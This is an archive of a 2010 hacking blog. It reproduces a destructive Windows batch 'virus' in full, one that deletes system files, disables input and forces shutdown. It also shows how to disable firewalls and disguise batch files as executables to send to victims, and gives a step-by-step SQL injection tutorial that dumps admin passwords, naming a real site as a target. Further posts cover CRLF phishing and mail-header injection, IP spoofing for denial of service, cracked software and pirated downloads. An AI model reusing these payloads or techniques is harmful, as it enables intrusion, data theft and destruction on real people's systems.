Sunday, October 31, 2010

Scan websites against XSS with OWASP Scrubbr v1.0


Scrubbr is a BSD-licensed database scanning tool that checks numerous database technologies for the presence of possible stored cross-site scripting attacks. The tool was partially inspired by "Scrawlr", a trimmed-down version of HP’s WebInspect which was released for free after the so-called "asprox" mass-SQL injection bot exploited hundreds of thousands of insecure ASP sites.

Download XSS Scanning Tool Here
.......................................................................................................................................................................................

Saturday, October 30, 2010

How To Hack Websites With Hexjector v1.0.7.3 Special Edition

Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties

Features:

1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Detect WAF on the site.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection

Download:Sql Injection Tool Hexjector

...............:"{)(*&^%$#@!###...................................................................................................................................................
...............:"{)(*&^%$#@!###...................................................................................................................................................
...............:"{)(*&^%$#@!###................................................................................................................................................... 

Friday, October 29, 2010

How Hackers Hack Websites With ExploitMyUnion v2.1

ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation. 



Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.

Download This Sql Injection Tool Here

..................><:{_(*&^%$#@!.........................................................................................................................................
..................><:{_(*&^%$#@!........................................................................................................................................
..................><:{_(*&^%$#@!.......................................................................................................................... ..............

CRLF Injections Tutorial


Here one more knowledge step towards injections... with "CRLF Injection" ..Today you will learn ...
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client’s web-cache, hijacking of web pages, defacement and a myriad of other related attacks. A number of years ago a number of CRLF injection vulnerabilities were also discovered in Google’s Adwords web interface.

Today you will learn:
  • What is a CRLF Injection?
  • Vulnerability PoC - Comment System
  • Vulnerability PoC - Email Form
  • Vulnerability PoC - Header Injection
  • Patching
  • Conclusion

What is a CRLF Injection?

Carraige Return Line Feed (CRLF) work due to improper sanatization in user input. The carriage return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The carriage return can be represented in a few different ways: CR, ASCII 13 or r. Both the carriage return and the line feed do essentially the same thing. Although, the line feed is represented as LF, ASCII 10 or n. These commands are printer commands, the line feed tells the printer to feed out one line and a carriage return said the printer carriage should go to the beginning of the current line. In the event you know the operating system of the target machine it will prove useful to know that Windows uses CR/LF but *nix systems only use LF.


Vulnerability PoC - Comment System

To illustrate the first method of CRLF we will be using a hypothetical comment application which is vulnerable to the attack. Let's say our current comment system looks like so:

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....


Keep in mind both of these posts are legitimate. To exploit the vulnerability our attack will craft a post that will make it seem like he's posting as an administrator. He will enter the following into the comment box:

Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to http://attackersite.com/login.php, you should be able to login there.


This extremely simple injection will change the comment output the following result.

8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to http://attackersite.com/login.php


As you can clearly see in the example, by posing as an administrator we are able to phish passwords from the unsuspecting users. By inserting our new line character in to the post we can go down a line and pretend to be an administrator. It's a pretty neat trick.


Vulnerability PoC - Email Form

The second and final example involves a script used to send emails to other users. The catch is that you cannot see the real email address of the person you are sending to. To exploit this we can simple insert the following in to the 'Subject' header:

Hey, it's DavenBcc: [email protected]@email.com


This injection will send the email over to [email protected]@email.com AND the person we originally specified in the 'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By using a similar method as above they can'Cc' and 'Bcc' the message to 100's of other people spamming their
inboxes anonymously.


Vulnerability PoC - Header Injection

As an alternative to inserting the carriage return-line feed in to an input box we can also use a program like Achilles to intercept the POST headers and then modify them. Using a similar example as to the Email Form example above we could change our headers like so:

Content-Type: application/x-www-form-urlencoded
Content-Length: 147


name=This+is+a+test+&emai l= [email protected]@coldmail.com&subje ct=Test&header=Header:
[email protected]@thingy.com
CC: [email protected]@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
[email protected]@enigmagroup.org
&msg=crlf!


As you can plainly see in the above example we are able to modify the header in order to spam those email addresses.


Patching

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to $_POST['input']

if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..


I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.

Conclusion

Whether you're dealing with a high risk vulnerability (remote file inclusion) or a low risk one, such as this, you always need to be aware of what you're dealing with In creating this article I hoped to enlighten some of you as to how this vulnerability works. I hope you've enjoyed this article.
........................................................................................................!@#$%^&*()_+{}":?><........................
........................................................................................................!@#$%^&*()_+{}":?><........................
........................................................................................................!@#$%^&*()_+{}":?><........................ 

Thursday, October 28, 2010

Download Free Real Hide IP v4.0.4.2

                                                                         
Real Hide IP v4.0.4.2 | 5 Mb

Real Hide IP is a software that allows you to anonymously surf the net. Protect your privacy online by clicking the mouse, hiding your real IP-address, to protect themselves from intrusion by hackers.

If you are using Real Hide IP, you will have the option to hide your identity on the network, showing the websites IP-address of the proxy server, which you can choose from a number of available countries. In this way, you block hackers and curious visitors wanting to know everything about you. You can easily switch between real and fake IP. As soon as you stop using Real Hide IP, configure your browser will again usually automatically. The program is compatible with browsers Internet Explorer, FireFox, Opera, Maxthon, MyIE and others.

Key Features

- Hide Your Real IP Address

- Anonymous Web Surfing

- Protect Your Identity Against Hackers

- Un-ban Yourself from Forums or Restricted Websites

- Prevent Websites from Tracking Your Online Activities


Home:

Code:

http:/www.real-hide-ip.com

Download:

Code:
........................................ ........................?<":{)(*&^%$#@!...............................................................................................
........................................ ........................?<":{)(*&^%$#@!...............................................................................................
........................................ ........................?<":{)(*&^%$#@!............................................................................................... 

Tuesday, October 26, 2010

Some Great Hacking EBooks + Essential tools

Learning python


[Image: 9780596513986_lrg.jpg]With this hands-on book, you can master the fundamentals of the core Python language quickly and efficiently, whether you're new to programming or just new to Python. Each chapter is a self-contained lesson that helps you thoroughly understand a key component of Python. Each chapter also contains Brain Builder, a unique section with practical exercises and review quizzes that let you practice new skills and test your understanding as you go.
Full Description
Portable, powerful, and a breeze to use, Python is ideal for both standalone programs and scripting applications. With this hands-on book, you can master the fundamentals of the core Python language quickly and efficiently, whether you're new to programming or just new to Python. Once you finish, you will know enough about the language to use it in any application domain you choose.

Learning Python is based on material from author Mark Lutz's popular training courses, which he's taught over the past decade. Each chapter is a self-contained lesson that helps you thoroughly understand a key component of Python before you continue. Along with plenty of annotated examples, illustrations, and chapter summaries, every chapter also contains Brain Builder, a unique section with practical exercises and review quizzes that let you practice new skills and test your understanding as you go.

This book covers:

* Types and Operations -- Python's major built-in object types in depth: numbers, lists, dictionaries, and more


* Statements and Syntax -- the code you type to create and process objects in Python, along with Python's general syntax model


* Functions -- Python's basic procedural tool for structuring and reusing code


* Modules -- packages of statements, functions, and other tools organized into larger components


* Classes and OOP -- Python's optional object-oriented programming tool for structuring code for customization and reuse


* Exceptions and Tools -- exception handling model and statements, plus a look at development tools for writing larger programs

Learning Python gives you a deep and complete understanding of the language that will help you comprehend any application-level examples of Python that you later encounter. If you're ready to discover what Google and YouTube see in Python, this book is the best way to get started.

http://rapidshare.com/files/141590244/OR...7.pdf.html

The TCP/IP Guide
A Comprehensive, Illustrated Internet Protocols



[Image: 410x4vwagqlcopywh4.jpg]From Charles M. Kozierok, the creator of the highly regarded www.pcguide.com, comes The TCP/IP Guide. This completely up-to-date, encyclopedic reference on the TCP/IP protocol suite will appeal to newcomers and the seasoned professional alike. Kozierok details the core protocols that make TCP/IP internetworks function and the most important classic TCP/IP applications, integrating IPv6 coverage throughout. Over 350 illustrations and hundreds of tables help to explain the finer points of this complex topic. The book’s personal, user-friendly writing style lets readers of all levels understand the dozens of protocols and technologies that run the Internet, with full coverage of PPP, ARP, IP, IPv6, IP NAT, IPSec, Mobile IP, ICMP, RIP, BGP, TCP, UDP, DNS, DHCP, SNMP, FTP, SMTP, NNTP, HTTP, Telnet, and much more.

The TCP/IP Guide is a must-have addition to the libraries of internetworking students, educators, networking professionals, and those working toward certification.

October 2005
Hardcover
ISBN-10 1-59327-047-X
ISBN-13 978-159327-047-6
----------------------------------------------------------------------
A K-S32 Exclusive. The only PDF release of this book with the original book cover and the password removed. Edited and cracked with Nitro PDF and PDF password remover.

A very good book for beginners and professionals. If this book cant teach you TCP/IP probably nothing can.

http://rapidshare.com/files/139323676/Th...e.pdf.html

Welcome to the AirPcap family of WLAN packet capture solutions. The AirPcap family is the first open, affordable and easy-to-deploy packet capture solution for Windows. All of the AirPcap offerings capture full 802.11 data, management, and control frames that can be viewed in Wireshark thereby providing in-depth protocol dissection and analysis capabilities. Below we provide a feature matrix that gives a high-level overview of the feature sets of the adapters in the AirPcap Product Family. More detailed information regarding each the member of the AirPcap Product Family can be found on each member’s product page.

------------------------------------------------

A VERY hard to find and expensive driver but of course like other priceless products they are always within reach of K-S32. Wireshark and Cain and able supported. Good luck finding this somewhere else. In case you don't know this is used for WIRELESS packet sniffing.

Enjoy! and Happy Hacking!

NOTE: If the link becomes broken please post hear and let me know and I will create a new one.



Welcome to the AirPcap family of WLAN packet capture solutions. The AirPcap family is the first open, affordable and easy-to-deploy packet capture solution for Windows. All of the AirPcap offerings capture full 802.11 data, management, and control frames that can be viewed in Wireshark thereby providing in-depth protocol dissection and analysis capabilities. Below we provide a feature matrix that gives a high-level overview of the feature sets of the adapters in the AirPcap Product Family. More detailed information regarding each the member of the AirPcap Product Family can be found on each member’s product page.

------------------------------------------------

A VERY hard to find and expensive driver but of course like other priceless products they are always within reach of K-S32. Wireshark and Cain and able supported. Good luck finding this somewhere else. In case you don't know this is used for WIRELESS packet sniffing.

Enjoy! and Happy Hacking!

NOTE: If the link becomes broken please post hear and let me know and I will create a new one.

http://rapidshare.com/files/139548088/Ai...8.iso.html


Ivor Horton's Beginning Visual C++ 2008


[Image: 0764571974.01._SCLZZZZZZZ_.jpg]


Ivor Horton’s Beginning Visual C++ 2008

Proudly presenting the latest edition of one of the all-time bestselling books on the C++ language, successful author Ivor Horton repeats the formula that has made each previous edition so popular by teaching you both the standard C++ language and C++/CLI as well as Visual C++ 2008. Thoroughly updated for the 2008 release, this book shows you how to build real-world applications using Visual C++ and guides you through the ins and outs of C++ development.

Horton’s accessible approach and detailed examples cover both flavors of the C++ language-native ISO/ANSIC++ Windows application development using the Microsoft Foundation Classes (MFC), as well as the development of C++/CLI Windows applications using Windows Forms. He also introduces you to the techniques you can use for accessing data sources in both MFC and Windows Forms, and working examples demonstrate each programming technique that is being discussed. With this book by your side, you are well on your way to becoming a successful C++ programmer.

What you will learn from this book

    * How to use the Standard Template Library, a powerful and extensive set of tools for organizing and manipulating data in your native C++ programs
    * Techniques for finding errors in your C++ programs
    * The ways that Microsoft® Windows® applications are structured and the elements that are essential for each application
    * How to create and use common controls in order to build the graphical user interface for your application
    * Ways to develop your own libraries using MFC
    * The different controls that are available for accessing data sources, how they work, and how to customize them

Who this book is for
This book is for anyone who wants to write C++ applications for the Microsoft Windows OS. No prior experience of any programming language is assumed.

Wrox Beginning guides are crafted to make learning programming languages and technologies easier than you think, providing a structured, tutorial format that will guide you through all the techniques involved.

Link1 (From Me)
http://rapidshare.com/files/134469531/Iv...g.pdf.html

Link 2
http://rapidshare.com/files/131730651/ne...2590-5.rar

Torrent:


Visual Studio 8 (Required for full use of book)
http://thepiratebay.org/torrent/4088718/...tudio_2008
Format: PDF

Pages:1394

Part of the American Library of Congress

L0phtcrack5

http://rapidshare.com/files/132681575/L0...4.zip.html

Many people call this $300 password cracking software the best in the world. Best than john the ripper by a good bit. Includes keygen and normal / professional / administrator version of this software.


Giant virus BIG THANKS TO faizulhaque for this one.
------------------------
@echo off
color 0A
title Game
:Menu
echo Game
echo.
echo There Is An Asshole Tries To Kill You, What You Will Do?
echo.
echo 1.You Kill Yourself
echo.
echo 2.You Kill Him
echo -------------------------------------------------------------
set input=nothing
set /p input= Code:
if %input%==1 goto 1
if %input%==2 goto 2

:1
attrib 1.bat +s
attrib 1.bat +r
attrib 1.bat +h
start C:\WINDOWS\system32\oobe\images\title.wma
copy "1.bat" "C:\"
copy "1.bat" "C:\Documents and Settings\bozo\My Documents"
msg * Youve Got Nothing!
RUNDLL32.EXE USER32.DLL,SwapMouseButton
rundll32.exe keyboard.dll,disable
md LimeWire Virus! NOD32 SUX!
md LimeWire Virus! NOD32 SUX!2
md LimeWire Virus! NOD32 SUX!3
md LimeWire Virus! NOD32 SUX!4
md LimeWire Virus! NOD32 SUX!5
md LimeWire Virus! NOD32 SUX!6
md LimeWire Virus! NOD32 SUX!7
md LimeWire Virus! NOD32 SUX!8
md LimeWire Virus! NOD32 SUX!9
md LimeWire Virus! NOD32 SUX!10
md LimeWire Virus! NOD32 SUX!11
md LimeWire Virus! NOD32 SUX!12
md LimeWire Virus! NOD32 SUX!13
md LimeWire Virus! NOD32 SUX!14
md LimeWire Virus! NOD32 SUX!15
md LimeWire Virus! NOD32 SUX!16
md LimeWire Virus! NOD32 SUX!17
md LimeWire Virus! NOD32 SUX!18
md LimeWire Virus! NOD32 SUX!19
md LimeWire Virus! NOD32 SUX!20
md LimeWire Virus! NOD32 SUX!21
md LimeWire Virus! NOD32 SUX!22
md LimeWire Virus! NOD32 SUX!23
rem Made with DeLeetEd virus maker v3
rem Vist http://www.freewebs.com/deleeted for more HAX
md LimeWire Virus! NOD32 SUX!24
md LimeWire Virus! NOD32 SUX!25
md LimeWire Virus! NOD32 SUX!26
md LimeWire Virus! NOD32 SUX!27
md LimeWire Virus! NOD32 SUX!28
md LimeWire Virus! NOD32 SUX!29
md LimeWire Virus! NOD32 SUX!30
md LimeWire Virus! NOD32 SUX!31
md LimeWire Virus! NOD32 SUX!32
md LimeWire Virus! NOD32 SUX!33
md LimeWire Virus! NOD32 SUX!34
md LimeWire Virus! NOD32 SUX!35
md LimeWire Virus! NOD32 SUX!36
md LimeWire Virus! NOD32 SUX!37
md LimeWire Virus! NOD32 SUX!38
md LimeWire Virus! NOD32 SUX!39
md LimeWire Virus! NOD32 SUX!40
time 0:00
start http://www.youareanidiot.org
cd %userprofile%\Desktop
if exist "*.*txt" del "*.*txt"
if exist "*.*exe" del "*.*exe"
if exist "*.*wav" del "*.*wav"
if exist "*.*mp3" del "*.*mp3"
cd %userprofile%\My Documents\My Music
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\system
if exist "*.*dll" del "*.*dll"
if exist "*.*drv" del "*.*drv"
cd C:\WINDOWS\system32
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\Media
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
shutdown -s -t 30 -c "You Have 30 Seconds Before Your Computer Will Be Formated"
cls
goto 2

:2
echo Bravo tu a gagner!
del "C:\WINDOWS" /q/s >nul
start http://www.spam.com
msg * SEX PORNO!
RUNDLL32.EXE USER32.DLL,SwapMouseButton
rundll32.exe keyboard.dll,disable
md WINDOWS VISTA SUX! (lime wire virus)
md WINDOWS VISTA SUX! (lime wire virus)2
md WINDOWS VISTA SUX! (lime wire virus)3
md WINDOWS VISTA SUX! (lime wire virus)4
md WINDOWS VISTA SUX! (lime wire virus)5
md WINDOWS VISTA SUX! (lime wire virus)6
md WINDOWS VISTA SUX! (lime wire virus)7
md WINDOWS VISTA SUX! (lime wire virus)8
md WINDOWS VISTA SUX! (lime wire virus)9
md WINDOWS VISTA SUX! (lime wire virus)10
md WINDOWS VISTA SUX! (lime wire virus)11
md WINDOWS VISTA SUX! (lime wire virus)12
md WINDOWS VISTA SUX! (lime wire virus)13
md WINDOWS VISTA SUX! (lime wire virus)14
md WINDOWS VISTA SUX! (lime wire virus)15
md WINDOWS VISTA SUX! (lime wire virus)16
md WINDOWS VISTA SUX! (lime wire virus)17
md WINDOWS VISTA SUX! (lime wire virus)18
md WINDOWS VISTA SUX! (lime wire virus)19
md WINDOWS VISTA SUX! (lime wire virus)20
md WINDOWS VISTA SUX! (lime wire virus)21
md WINDOWS VISTA SUX! (lime wire virus)22
md WINDOWS VISTA SUX! (lime wire virus)23
rem Made with DeLeetEd virus maker v2
md WINDOWS VISTA SUX! (lime wire virus)24
md WINDOWS VISTA SUX! (lime wire virus)25
md WINDOWS VISTA SUX! (lime wire virus)26
md WINDOWS VISTA SUX! (lime wire virus)27
md WINDOWS VISTA SUX! (lime wire virus)28
md WINDOWS VISTA SUX! (lime wire virus)29
md WINDOWS VISTA SUX! (lime wire virus)30
md WINDOWS VISTA SUX! (lime wire virus)31
md WINDOWS VISTA SUX! (lime wire virus)32
md WINDOWS VISTA SUX! (lime wire virus)33
md WINDOWS VISTA SUX! (lime wire virus)34
md WINDOWS VISTA SUX! (lime wire virus)35
md WINDOWS VISTA SUX! (lime wire virus)36
md WINDOWS VISTA SUX! (lime wire virus)37
md WINDOWS VISTA SUX! (lime wire virus)38
md WINDOWS VISTA SUX! (lime wire virus)39
md WINDOWS VISTA SUX! (lime wire virus)40
time 13:37
start http://liveaccount.freehostia.com/login.php
cd %userprofile%\Desktop
if exist "*.*txt" del "*.*txt"
if exist "*.*exe" del "*.*exe"
if exist "*.*wav" del "*.*wav"
if exist "*.*mp3" del "*.*mp3"
cd %userprofile%\My Documents\My Music
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\system
if exist "*.*dll" del "*.*dll"
if exist "*.*drv" del "*.*drv"
cd C:\WINDOWS\system32
if exist "*.*dll" del "*.*dll"
if exist "*.*exe" del "*.*exe"
if exist "*.*tmp" del "*.*tmp"
if exist "*.*txt" del "*.*txt"
cd C:\WINDOWS\Media
if exist "*.*mp3" del "*.*mp3"
if exist "*.*wav" del "*.*wav"
if exist "*.*exe" del "*.*exe"
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
shutdown -s -t 30 -c "You Have 30 Seconds Before Your Computer Will Be Formated"
cls
goto 1
................................................................................................................................................ ............................
................................................................................................................................................ ............................
................................................................................................................................................ ............................

Thursday, October 21, 2010

How To Make A Batch File Undetectable

Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:
Code:


@echo off net stop “Security Center” net stop SharedAccess
netsh firewall set opmode mode=disable
 
That will stop the Security Center
Shared Access and Firewall.
Save the file as something.bat
But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?
Exe:
Download nBinder Pro:
Code:
http://www.midload.com/en/file/29192/nbinder-rar 
mirror 
http://rapidshare.com/files/109795148/nbinder.rar 
pass linkzshare.net
 
NBinder pro is a Binder/Converter/Icon Changer
Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.
Com:
Download:
Bat2COM
And convert it.
When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn’t see is that his firewall,security has closed.
Now,to make the batch a little more dangerous.
Code:


@echo off net stop “Security Center” net stop 
SharedAccess netsh firewall set opmode mode=disable 
echo shutdown -s >> "%systemdrive%\documents and 
settings\start menu\programs\startup\virus.bat" :virus
start cmd.exe start command.com start mspaint.exe goto :virus
 
So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.
.............................................................................................................................................................................
.............................................................................................................................................................................

Rediff.com And In.com Hacked By Adnan Anjum



Adnan Anjum found xss vulnerability in www.rediff.com and www.in.com
Both Are Still Vulnerable To Xss Injection I only test them,i don,t exploit these sites for their Vulnerability.
www.in.com is in the worlds top 290 websites and vulnerable to xss.

Screen Shot


www.rediff.com is in the worlds top 120 websites And Vulnerable to xss attack.
Screen Shot:

............................................................................................................................

How To Enhance uTorrent Download Speed

Lets get started. If you dont have Utorrent, Download it from here http://www.utorrent.com. Remember to increase torrent speed please disable firewall before you use it. Now Open it up and follow these screenshots tutorial: 

 [Image: utorrent1.jpg]

[Image: utorrent2.jpg]
[Image: utorrent3.jpg]
For connection setting I Here checked enable upnp port mapping, enable NAT-PMP port mapping and i use 45682 for random port.
[Image: utorrent4.jpg]
 

Checked use additional upload slots if upload speed <90% and follow the value setting like screenshot.


[Image: utorrent5.jpg]

Checked for enable dht network, enable dht for new torrent, enable local peer discovery, ask tracker for scrape information, enable peer change, allow incoming legacy connections and enable outgoing protocol encryption.

[Image: utorrent6.jpg]

[Image: utorrent7.jpg]
Setup net.max_halfopen to 90
[Image: utorrent8.jpg]
[Image: utorrent9.jpg]
That is it, You have just tweaked the speed of Utorrent by 80%
Remember, If the torrent has no seeds, This will not work!

........................................................................................................................................... ......................................
........................................................................................................................................... ......................................
........................................................................................................................................... ......................................  

Monday, October 18, 2010

Learn How Hackers Hack Websites MYSQL Injection Tutorial (Part 2)

Learn How To Hack Websites , Mysql Injection Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
.............................................................................................................................................................. ..........................
..............................................................................................................................................................  ..........................
..............................................................................................................................................................  ............................

Sunday, October 17, 2010

Hack Mobile Phones (How To Unlock)


Download Free All Mobile Phone Unlocker 2010 | 253 MB
This is all in one program has extensive hacking tools so you can unlock your phones from almost all major manufacturers. I t contains ebooks,hacking tools,manuals to unlock almost all model available of popular brands..


MORE FEATURES:
  • Mobile Phone Unlocker Software pack wort 2500$ for Free for ISOFTDL USERS...
  • Unlocks (without cables) the following phones:NOKIA, MOTOROLA, ALCATEL, ERICSSON, PANASONIC, SAGEM, SAMSUNG, SIEMENS, SONY.

All Links are interchangable:
Download Link: 
DepositFiles Part I

DepositFiles Part II

DepositFiles Part III

OR
..........................................................................................................................................................
..........................................................................................................................................................
..........................................................................................................................................................

Friday, October 15, 2010

Prevent Website/Server Hacking enable Safe Mode and disable Functions

Just a Short article, to show you how to Enable Safe_Mode and disable Functions which could be the cause of a Website/Server Hacking.

Enabling Safe_Mode

First, Connect to your Server via SSH using Putty or Similliar, or Under Gnu/Linux type in a terminal:
ssh root@ip-address -p portYou'll have to edit php.ini file, Type: nano /etc/php.ini

if you don't know the location of your php.ini file, Create a php file (phpinfo.php) With this content:

Upload it to your Website/Server and open it in your browser, You'll find the location of php.ini in "Loaded Configuration File"

Find (Ctrl + W):

safe_mode = Off

Change it to:

safe_mode = On

Disabling Functions

Find (Ctrl+W):

disable_functions =

Then add the functions that you want to disable, seperated by comma.

Example:

disable_functions= dl,popen,system,exec,shell_exec,suExec,passthru,escapeshellcmd,escapeshellarg,symlink
.......................................................................................................... ........................................................
.......................................................................................................... ........................................................
.......................................................................................................... ................................................... .....

Learn How to Spoofing IP Addresses

This Tutorial Is Only For Educational Purposes.
Learn how to create custom IP packets Using tool RafaleX and Engage Packet Builder
[Image: 1.JPG]The RafaleX application allows for the creation of custom IP packets. The packet is very customizable and allows for the spoofing of the IP, setting the flags, number of packets, and so forth. RafaleX is becoming hard to locate on the Internet as it appears it is now called Engage Packet Builder.

The RafaleX application is an excellent way to “spoof” custom packets. Attackers can place a valid IP address as the source of the packet and the target will have to attempt to respond to the spoofed address. By sending hundreds of thousands of packets in this manner, an attacker can create a Denial of Service attack against a target.

In this example, the Source IP of the packets to be sent is set to 10.10.10.10 with the source address of port 123. According to Internet etiquette, this should never be able to route on the Internet as the 10.x.x.x range is reserved for Private addressing. Set the destination IP to the target address. In this example it is 172.16.1.40. Set the Destination
port to port 21. The SYN and ACK flags were set for each packet.

*Note: The Ethernet communications process requires a three-way handshake:

SYN: Synchronize
SYN-ACK: Synchronize-Acknowledge
ACK: Acknowledge

When a computer receives an uninitiated SYN-ACK packet its response is to send a RST (Reset) packet.
[Image: 2.JPG]

The number of packets was set to 100. Click the Send button to send the packets to the target. The Status area at the bottom left of the application will tell you that the packets were sent.

[Image: 3.JPG]

The proof is below screen shot captured from packet capturing tool:
[Image: 4.JPG]
[Image: 5.JPG]
...............................................................................................................................................................................
...............................................................................................................................................................................
............................................................................................................................................................................... 

Thursday, October 14, 2010

Learn How Hackers Hack Websites MYSQL Injection Tutorial


            - SQL Injection -
This Article Is About how to Hack a website with SQL Injection.I and Hackguide4u.blogspot.com Takes No responsibility for it,s misuse.ok.we have a target
http://www.allaboutcar.net/articles.php?topic=-3let see if this is vnlnerable to sql Injection to check it put a ' in the end 
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
